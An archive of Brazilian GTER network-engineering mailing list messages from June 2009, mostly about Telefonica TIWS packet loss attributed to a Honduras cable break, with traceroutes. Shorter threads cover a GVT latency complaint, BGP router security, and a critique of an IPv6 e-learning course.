Ainda problemas com a telefonica In-Reply-To: <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> Message-ID: Pina, Nesse caso somente o pessoal que conhece a topologia da Tiws poderia explicar :-) -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D 2009/6/3 Antonio Carlos Pina > Humberto, > > A Telefonica contou essa historia para todo mundo que abriu chamado. As > minhas d?vidas sobre o assunto na verdade s?o: > > a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras > afetou o Brasil ? > b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? > > Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que > a > hist?ria ? maior que isso. > > Abs > > > 2009/6/3 Humberto Sartini > > > Pessoal, > > > > Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo > > submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. > > > > http://www.telecompaper.com/news/SendArticle.aspx?u=False > > > > -- > > [ ]'s > > Humberto Sartini > > Certificado LPIC-1 > > http://www.hss.blog.br > > PGP KEY ID 0xB32E5C8D > > > > 2009/6/3 Mike Tesliuk > > > > > Foi informado aqui na lista uma informa??o referente a um problema com > > > rompimento de fibra, um de nossos usu?rios disse que a telefonica > > > passou hoje a mesma informa??o para ele informando que a estrutura de > > > backup est? sobrecarregada. > > > > > > 2009/6/2 Victor Benincasa : > > > > Mike e colegas de lista, > > > > > > > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > > > > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam > > > links > > > > da Telef?nica (em especial o Speedy) est?o relatando problemas no > > > > recebimento de e-mails (timeout). > > > > > > > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido > uma > > > > taxa de perda m?dia de 50%! > > > > > > > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > > > > > > > -- > > > > Victor Benincasa > > > > http://netbit.com.br > > > > > > > > > > > > ----- Original Message ----- From: "Mike Tesliuk" > > > > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > > > > > Sent: Tuesday, June 02, 2009 2:53 PM > > > > Subject: [GTER] Ainda problemas com a telefonica > > > > > > > > > > > > Ol? Amigos, > > > > > > > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > > > > (estamos a uma semana ja) ? > > > > > > > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > > > > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > > > > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > > > > tive que trocar para uma conex?o da net para podermos trabalhar > > > > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > > > > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > > > > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > > > > rota. > > > > > > > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > > > > 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms > > > > 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 > > > > ms 2.021 ms 2.016 ms > > > > 3 * * * > > > > 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms > > 2.532 > > > ms > > > > 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) > 2.810 > > > > ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > > > > (201.63.253.146) 2.754 ms > > > > 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > > > > (84.16.10.17) 4.943 ms 4.008 ms > > > > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) > 4.138 > > > > ms > > > > 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > > > > 117.589 ms 117.636 ms 117.604 ms > > > > 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net(213.140.36.229) > > > > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.36.153) 152.998 ms > > > > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > > > 162.824 ms > > > > 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms > > > > 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 > ms > > * > > > * > > > > > > > > > > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de > email > > > > e ftp, sites, eles tentam acessar fica carregando, quando tentam > > > > novamente eles conseguem ( ou n?o ) > > > > > > > > Agrade?o informa??es. > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Wed Jun 3 14:52:24 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Wed, 03 Jun 2009 14:52:24 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> Message-ID: <4A26B858.30008@cyberweb.com.br> Existe um grande problema na "nossa ?rea"... Um problema que gera problemas em cadeia, ou nao necessariamente isso. A fibra que rompeu em Honduras, pode ter ou nao a ver com o problema de TCP, mas como o pessoal que responde ?s d?vidas dos clientes nao entende muito nem tem acesso a todas as informa??es, acaba mascarando o problema de TCP, pois alguem disse: "fala isso, pois pode ter rela??o". Quando na realidade acabam por encobrir um seugndo problema que pode nao ser relacionado. Cabe treinar melhor o atendimento/suporte para conseguir separar a soja do trigo e identificar que um problema gera X efeitos e o outro problema gera Y efeitos. Infelizmente como s?o primos, eles dizem que XY = YX, entao uma semana depois algum tecnico resolve desfazer o que causou Y, e Y ? resolvido sem que tenha sido relacionado com X... fora os clientes com problema Z, que ja chegam achando que ? causado por X e bagun?am ainda mais a cabe?a de quem for registrar o chamado na operadora... Enfim, COMPLICADO! Juliano Antonio Carlos Pina escreveu: > Humberto, > > A Telefonica contou essa historia para todo mundo que abriu chamado. As > minhas d?vidas sobre o assunto na verdade s?o: > > a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras > afetou o Brasil ? > b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? > > Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que a > hist?ria ? maior que isso. > > Abs > > > 2009/6/3 Humberto Sartini > > >> Pessoal, >> >> Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo >> submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. >> >> http://www.telecompaper.com/news/SendArticle.aspx?u=False >> >> -- >> [ ]'s >> Humberto Sartini >> Certificado LPIC-1 >> http://www.hss.blog.br >> PGP KEY ID 0xB32E5C8D >> >> 2009/6/3 Mike Tesliuk >> >> >>> Foi informado aqui na lista uma informa??o referente a um problema com >>> rompimento de fibra, um de nossos usu?rios disse que a telefonica >>> passou hoje a mesma informa??o para ele informando que a estrutura de >>> backup est? sobrecarregada. >>> >>> 2009/6/2 Victor Benincasa : >>> >>>> Mike e colegas de lista, >>>> >>>> Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet >>>> (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam >>>> >>> links >>> >>>> da Telef?nica (em especial o Speedy) est?o relatando problemas no >>>> recebimento de e-mails (timeout). >>>> >>>> Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma >>>> taxa de perda m?dia de 50%! >>>> >>>> Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? >>>> >>>> -- >>>> Victor Benincasa >>>> http://netbit.com.br >>>> >>>> >>>> ----- Original Message ----- From: "Mike Tesliuk" >>>> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >>>> >>>> Sent: Tuesday, June 02, 2009 2:53 PM >>>> Subject: [GTER] Ainda problemas com a telefonica >>>> >>>> >>>> Ol? Amigos, >>>> >>>> Eu queria saber se algu?m est? tendo problemas com a telefonica ainda >>>> (estamos a uma semana ja) ? >>>> >>>> Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores >>>> que utilizam a estrutura da telefonica n?o est?o chegando at? nossos >>>> servidores (com qualidade), n?s mesmos temos uma lp da telefonica e >>>> tive que trocar para uma conex?o da net para podermos trabalhar >>>> enquanto este problema n?o se resolve, basicamente eu tenho ping ok >>>> atrav?s da telefonica, a rota pelo que me parece eu passo por dentro >>>> da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha >>>> rota. >>>> >>>> traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets >>>> 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms >>>> 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 >>>> ms 2.021 ms 2.016 ms >>>> 3 * * * >>>> 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms >>>> >> 2.532 >> >>> ms >>> >>>> 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 >>>> ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br >>>> (201.63.253.146) 2.754 ms >>>> 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add >>>> (84.16.10.17) 4.943 ms 4.008 ms >>>> Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 >>>> ms >>>> 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) >>>> 117.589 ms 117.636 ms 117.604 ms >>>> 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) >>>> 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net >>>> (213.140.36.153) 152.998 ms >>>> Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) >>>> 162.824 ms >>>> 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net >>>> (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms >>>> 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms >>>> >> * >> >>> * >>> >>>> Meus clientes est?o tendo dificuldades para utilizar servi?os de email >>>> e ftp, sites, eles tentam acessar fica carregando, quando tentam >>>> novamente eles conseguem ( ou n?o ) >>>> >>>> Agrade?o informa??es. >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From security at neogrid.com Wed Jun 3 15:07:02 2009 From: security at neogrid.com (NOC NeoGrid) Date: Wed, 3 Jun 2009 15:07:02 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <4A26B858.30008@cyberweb.com.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> Message-ID: IMHO, o pior de tudo, conforme o Juliano falou... na "nossa ?rea"... ? a falta de transpar?ncia com o cliente. Tenho a impress?o de que treinam o atendente do 0800 a ativar o modo "enrolation" quando informam algum "problema" com a operadora. Isso me lembra uma frase que li hoje, onde terminava com... Telec?mica... Dilson. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Juliano Primavesi - Cyberweb Networks Enviada em: quarta-feira, 3 de junho de 2009 14:52 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Ainda problemas com a telefonica Existe um grande problema na "nossa ?rea"... Um problema que gera problemas em cadeia, ou nao necessariamente isso. A fibra que rompeu em Honduras, pode ter ou nao a ver com o problema de TCP, mas como o pessoal que responde ?s d?vidas dos clientes nao entende muito nem tem acesso a todas as informa??es, acaba mascarando o problema de TCP, pois alguem disse: "fala isso, pois pode ter rela??o". Quando na realidade acabam por encobrir um seugndo problema que pode nao ser relacionado. Cabe treinar melhor o atendimento/suporte para conseguir separar a soja do trigo e identificar que um problema gera X efeitos e o outro problema gera Y efeitos. Infelizmente como s?o primos, eles dizem que XY = YX, entao uma semana depois algum tecnico resolve desfazer o que causou Y, e Y ? resolvido sem que tenha sido relacionado com X... fora os clientes com problema Z, que ja chegam achando que ? causado por X e bagun?am ainda mais a cabe?a de quem for registrar o chamado na operadora... Enfim, COMPLICADO! Juliano Antonio Carlos Pina escreveu: > Humberto, > > A Telefonica contou essa historia para todo mundo que abriu chamado. As > minhas d?vidas sobre o assunto na verdade s?o: > > a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras > afetou o Brasil ? > b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? > > Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que a > hist?ria ? maior que isso. > > Abs > > > 2009/6/3 Humberto Sartini > > >> Pessoal, >> >> Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo >> submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. >> >> http://www.telecompaper.com/news/SendArticle.aspx?u=False >> >> -- >> [ ]'s >> Humberto Sartini >> Certificado LPIC-1 >> http://www.hss.blog.br >> PGP KEY ID 0xB32E5C8D >> >> 2009/6/3 Mike Tesliuk >> >> >>> Foi informado aqui na lista uma informa??o referente a um problema com >>> rompimento de fibra, um de nossos usu?rios disse que a telefonica >>> passou hoje a mesma informa??o para ele informando que a estrutura de >>> backup est? sobrecarregada. >>> >>> 2009/6/2 Victor Benincasa : >>> >>>> Mike e colegas de lista, >>>> >>>> Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet >>>> (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam >>>> >>> links >>> >>>> da Telef?nica (em especial o Speedy) est?o relatando problemas no >>>> recebimento de e-mails (timeout). >>>> >>>> Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma >>>> taxa de perda m?dia de 50%! >>>> >>>> Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? >>>> >>>> -- >>>> Victor Benincasa >>>> http://netbit.com.br >>>> >>>> >>>> ----- Original Message ----- From: "Mike Tesliuk" >>>> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >>>> >>>> Sent: Tuesday, June 02, 2009 2:53 PM >>>> Subject: [GTER] Ainda problemas com a telefonica >>>> >>>> >>>> Ol? Amigos, >>>> >>>> Eu queria saber se algu?m est? tendo problemas com a telefonica ainda >>>> (estamos a uma semana ja) ? >>>> >>>> Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores >>>> que utilizam a estrutura da telefonica n?o est?o chegando at? nossos >>>> servidores (com qualidade), n?s mesmos temos uma lp da telefonica e >>>> tive que trocar para uma conex?o da net para podermos trabalhar >>>> enquanto este problema n?o se resolve, basicamente eu tenho ping ok >>>> atrav?s da telefonica, a rota pelo que me parece eu passo por dentro >>>> da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha >>>> rota. >>>> >>>> traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets >>>> 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms >>>> 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 >>>> ms 2.021 ms 2.016 ms >>>> 3 * * * >>>> 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms >>>> >> 2.532 >> >>> ms >>> >>>> 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 >>>> ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br >>>> (201.63.253.146) 2.754 ms >>>> 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add >>>> (84.16.10.17) 4.943 ms 4.008 ms >>>> Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 >>>> ms >>>> 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) >>>> 117.589 ms 117.636 ms 117.604 ms >>>> 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) >>>> 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net >>>> (213.140.36.153) 152.998 ms >>>> Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) >>>> 162.824 ms >>>> 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net >>>> (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms >>>> 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms >>>> >> * >> >>> * >>> >>>> Meus clientes est?o tendo dificuldades para utilizar servi?os de email >>>> e ftp, sites, eles tentam acessar fica carregando, quando tentam >>>> novamente eles conseguem ( ou n?o ) >>>> >>>> Agrade?o informa??es. >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From ricardo at silicom.com.br Wed Jun 3 10:06:07 2009 From: ricardo at silicom.com.br (Ricardo Ranieri) Date: Wed, 03 Jun 2009 10:06:07 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28Telef=F3nica=29?= In-Reply-To: <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <-1283472318543576950@unknownmsgid> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> Message-ID: <4A26753F.6030605@silicom.com.br> Aqui estamos tendo problemas com v?rios clientes em que o site simplesmente n?o abre quando a conex?o ? pela Telefonica, se alteramos para o IP seguinte volta a funcionar mas, est? causando grandes transtornos. O trace e o ping do cliente para o servidor ocorre sem problemas. Ser? que isso est? relacionado com os problemas atuais que os colegas vem relatando ? Ricardo Ranieri - ricardo at silicom.com.br Silicom Internet Solution S?o Paulo: (11) 2626.0239 Rio de Janeiro: (21) 4062.0099 Porto Alegre: (51) 4062.0025 Skype: silicomisp Antonio Carlos Pina escreveu: > Concordo. A Not?cia que t?nhamos era que o rompimento de fibra ocorreu entre > o Peru e a am?rica do norte. > > Nenhuma rela??o direta conosco a n?o ser que os links remanescentes ficassem > sobrecarregados com o roteamento do tr?fego. Mas n?o explicaria o > funcionamento de ping e traceroute, por exemplo e o congelamento do SCP. > > Abs > > 2009/6/3 Raphael Costa > > >> A Telef?nica nos deu essa desculpa, s? n?o entendo porque o ping e >> traceroute n?o mostram isso. >> Tenho um cliente que possui um servidor no ThePlanet e outro aqui na >> empresa, esse servidor do Br tem 2 ips configurados, quando o cliente >> executa um scp do ThePlanet para o ip A desse servidor, a transfer?ncia >> come?a e logo depois d? timeout, para o ip B o scp funciona normalmente. >> Alteramos a sa?da para o ThePlanet por outro link, n?o resolveu, ent?o >> colocamos uma rota mais espec?fica pelo nosso link da Oi, assim tudo voltou >> a funcionar perfeitamente. >> >> []s, >> >> Raphael Costa >> >> 2009/6/2 Rodrigo Broilo >> >> >>> Boa tarde, >>> >>> A Telef?nica Wholesale (TIWS) est? com problemas de rompimento de fibra >>> >> em >> >>> Honduras, por isso a capacidade de tr?fego diminuiu e todos est?o >>> enfrentando problemas espor?dicos (alto tr?fego). Acho que a TIWS j? >>> >> esteja >> >>> usando meios alternativos para melhorar o servi?o (n?o tenho notado mais >>> lentid?o na minha conex?o). >>> >>> Fonte: >>> >>> >>> >> http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex >> >>> ao-da-web-no-Peru-.note.aspx< >>> >> http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex%0Aao-da-web-no-Peru-.note.aspx >> >>> Abs,. >>> >>> ------------------------------------------------------------- >>> Rodrigo Christian Broilo >>> rodrigo.broilo at terra.com.br >>> ------------------------------------------------------------- >>> Antes de imprimir pense no meio ambiente. >>> Esta mensagem pode conter informa??es confidenciais. Se a recebeu por >>> engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu >>> conte?do. >>> This message may contain confidential information. If received in error, >>> please return it to the sender, delete it and do not disclose its >>> >> content. >> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> -- >> Raphael Bittencourt S. Costa >> raphaelbscosta at yahoo.com.br >> raphaelbscosta at gmail.com >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From pizzolo at gmail.com Wed Jun 3 10:45:09 2009 From: pizzolo at gmail.com (Patrich Pizzolo) Date: Wed, 3 Jun 2009 10:45:09 -0300 Subject: [GTER] Problemas GVT - o que fazer? Message-ID: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> Bom dia a todos, gostaria de ter uma opini?o dos ilustres colegas que integram esta lista. Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT meu tempo de resposta entre a Eth do meu router e a do router da gvt que s?o interligados por uma fibra est? chegando a picos de at? 946ms com uma m?dia em torno de 10ms, isso com o link isolado e j? testei com diversos outros routers e sempre obtenho os mesmos tempos de resposta, definitivamente n?o tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer que est? tudo normal. J? nem aguento mais falar com eles... Algu?m tem alguma id?ia? No momento estou pensando em acionar e cancelar o link. Abra?os, Obrigado! From patrick at vol.net.br Wed Jun 3 11:27:13 2009 From: patrick at vol.net.br (Patrick Barreto Petronetto) Date: Wed, 3 Jun 2009 11:27:13 -0300 Subject: [GTER] =?iso-8859-1?q?Seguran=E7a_de_router_BGP?= Message-ID: Pessoal, O que geralmente voc?s fazem para proteger os roteadores que rodam BGP? H? alguma medida de seguran?a que deve ser aplicada (configurada) no equipamento para evitar algum tipo de ataque? Valeu! Patrick Barreto Petronetto patrick at vol.net.br Antes de imprimir, pense em sua responsabilidade e compromisso com o MEIO AMBIENTE. From alexandre at telbrax.com.br Wed Jun 3 12:06:20 2009 From: alexandre at telbrax.com.br (Alexandre Flach) Date: Wed, 3 Jun 2009 12:06:20 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__Problemas_na_TIWS_=28Telef=F3nica?= =?iso-8859-1?q?=29?= In-Reply-To: <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <-1283472318543576950@unknownmsgid> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> Message-ID: <00e501c9e45c$dc3a4420$94aecc60$@com.br> Alguem sabe me informar algum contato na TIWS para compra de banda IP? Atenciosamente, Alexandre Flach Diretoria Telbrax Ltda. Tel.: (31) 2555.5550 Fax: (31) 3283.6267 E-mail: alexandre at telbrax.com.br Telbrax - Solu??es que conectam sua empresa. Acesse: www.telbrax.com.br -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Antonio Carlos Pina Enviada em: quarta-feira, 3 de junho de 2009 09:58 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Problemas na TIWS (Telef?nica) Concordo. A Not?cia que t?nhamos era que o rompimento de fibra ocorreu entre o Peru e a am?rica do norte. Nenhuma rela??o direta conosco a n?o ser que os links remanescentes ficassem sobrecarregados com o roteamento do tr?fego. Mas n?o explicaria o funcionamento de ping e traceroute, por exemplo e o congelamento do SCP. Abs 2009/6/3 Raphael Costa > A Telef?nica nos deu essa desculpa, s? n?o entendo porque o ping e > traceroute n?o mostram isso. > Tenho um cliente que possui um servidor no ThePlanet e outro aqui na > empresa, esse servidor do Br tem 2 ips configurados, quando o cliente > executa um scp do ThePlanet para o ip A desse servidor, a transfer?ncia > come?a e logo depois d? timeout, para o ip B o scp funciona normalmente. > Alteramos a sa?da para o ThePlanet por outro link, n?o resolveu, ent?o > colocamos uma rota mais espec?fica pelo nosso link da Oi, assim tudo voltou > a funcionar perfeitamente. > > []s, > > Raphael Costa > > 2009/6/2 Rodrigo Broilo > > > Boa tarde, > > > > A Telef?nica Wholesale (TIWS) est? com problemas de rompimento de fibra > em > > Honduras, por isso a capacidade de tr?fego diminuiu e todos est?o > > enfrentando problemas espor?dicos (alto tr?fego). Acho que a TIWS j? > esteja > > usando meios alternativos para melhorar o servi?o (n?o tenho notado mais > > lentid?o na minha conex?o). > > > > Fonte: > > > > > http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex > > ao-da-web-no-Peru-.note.aspx< > http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex %0Aao-da-web-no-Peru-.note.aspx > > > > > > Abs,. > > > > ------------------------------------------------------------- > > Rodrigo Christian Broilo > > rodrigo.broilo at terra.com.br > > ------------------------------------------------------------- > > Antes de imprimir pense no meio ambiente. > > Esta mensagem pode conter informa??es confidenciais. Se a recebeu por > > engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu > > conte?do. > > This message may contain confidential information. If received in error, > > please return it to the sender, delete it and do not disclose its > content. > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Raphael Bittencourt S. Costa > raphaelbscosta at yahoo.com.br > raphaelbscosta at gmail.com > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From globalx at gmail.com Wed Jun 3 12:21:34 2009 From: globalx at gmail.com (Anderson Goulart) Date: Wed, 3 Jun 2009 12:21:34 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <4A247806.20301@nic.br> References: <4A247806.20301@nic.br> Message-ID: <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> Ol? Ant?nio e demais, ? uma ?tima iniciativa do CGI.br e NIC.br, entretanto, gostaria que revissem os modelos de e-learning considerados para este e outros cursos. Talvez eles n?o sejam suficientes para alcan?ar o objetivo de voc?s: disseminar o IPv6 e incentivar a migra??o. Digo isso porque estamos conversando sobre o tema na lista de EAD da Unicamp e alguns estudos j? foram feitos sobre a capacidade de aprendizado das pessoas. Vou reproduzir abaixo, um trecho de uma das mensagens do professor Milton Sobreiro que resume a discuss?o: "Minha especializa??o em EAD conclu? com um Estudo de Caso intitulado"Teleaula: Uma outra face da Educomunica??o", onde trabalho a quest?o da Teleaula sem tirar os olhos em algumas teorias de fundamental import?ncia - Teoria Cognitiva, Teoria da Comunica??o e Estilos de Aprendizagem. Para que tivesse uma subst?ncia pr?tica, afinal se tratava de um Estudo de Caso, fiz uma pesquisa de campo com 100 acad?micos de gradua??o e p?s-gradua??o lato-senso na modalidade EAD, afim de identificar seus estilos de aprendizagem de maior predomin?ncia, onde obtive o seguinte resultado: os estudantes com predomin?ncia sinest?sica somavam 68%, os visuais 25%, os que apresentavam um "empate t?cnico" entre visual e sinest?sico eram 4%, s? ent?o vinham os puramente auditivos com 2% e os visuais auditivos com 1%. O formato da Teleaula, produzidas com professores em plano americano, slides est?ticos, pouca movimenta??o, mudan?as de entona??es nas vozes ou BG sonoro, onde este docente fala, apenas, e monotonamente, e para piorar a situa??o deixam os slides muito pouco tempo no ar, para que o professor continue como o detentor pleno do conhecimento, se aproxima ? Educa??o Banc?ria, repudiada por Paulo Freire, de compet?ncia pedag?gica indiscut?vel. Ele s? atinge ao auditivo, que aprende com facilidade apenas ouvindo, mas o visual, que precisa ver o objeto de aprendizado para fazer suas analogias e mapas mentais, assim como o sinest?sico que precisa executar atividades, ver movimenta??es e entona??es diferenciadas na voz, ficam perdidos, dependendo de uma grava??o da aula para que possam reassist?-las assincronamente para parar, observar os slides, talvez anot?-los, ou experiment?-los, reouvir algumas falas do docente, para s? ent?o, tirar alguma coisa da aula... a? j? perdeu a oportunidade de intera??o ao vivo com aquele professor." Considerando o modelo proposto por voc?s no curso de IPv6, um n?mero pequeno conseguir? absorver o conte?do ou assistir at? o fim. Minha opini?o sobre o que j? assisti: - A pessoa que diz o texto parece n?o saber nada sobre o assunto. Ela tenta dar ?nfase em trechos das frases para parecer que sabe - A voz ? cont?nua, sem varia??es - A pessoa n?o acrescenta nada al?m do que j? est? escrito. Porque n?o fazer um manual ou cartilha ent?o? - A leitura ? lenta, cansativa para o ouvinte - Os detalhes visuais dos bot?es, menus, etc chamam mais 